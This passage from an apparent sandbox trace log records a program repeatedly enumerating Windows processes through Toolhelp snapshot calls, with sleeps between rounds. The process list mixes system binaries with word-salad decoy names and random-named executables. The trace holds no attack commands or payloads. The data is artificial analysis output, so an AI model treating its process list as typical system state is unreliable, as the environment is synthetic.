th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0105.296] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0105.297] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0105.298] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.299] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0105.300] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0105.302] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0105.303] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0105.304] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0105.305] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0105.306] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0105.307] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0105.308] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0105.309] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0105.310] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0105.311] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0105.312] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0105.313] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0105.314] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0105.315] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0105.316] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0105.317] Process32NextW (in: 
hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0105.318] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0105.319] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0105.320] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0105.321] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.322] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0105.323] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0105.324] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0105.325] CloseHandle (hObject=0xbc) returned 1 [0105.325] Sleep (dwMilliseconds=0x12c) [0105.668] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0105.673] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0105.674] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0105.674] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0105.675] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0105.676] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0105.676] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0105.677] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0105.678] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0105.678] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0105.679] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0105.680] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.681] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.682] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.682] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.683] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.684] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0105.684] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.685] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.686] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0105.687] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.688] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0105.689] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0105.690] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0105.691] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0105.692] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.694] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0105.695] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0105.696] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0105.697] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0105.698] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0105.699] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0105.700] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0105.701] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0105.702] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0105.703] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0105.743] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0105.744] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0105.746] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0105.747] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0105.748] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0105.749] Process32NextW (in: hSnapshot=0xc4, 
lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0105.750] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0105.751] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0105.752] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0105.753] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0105.754] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0105.755] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.756] 
Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0105.756] CloseHandle (hObject=0xc4) returned 1 [0105.757] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0105.761] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0105.762] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0105.763] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0105.764] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0105.764] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 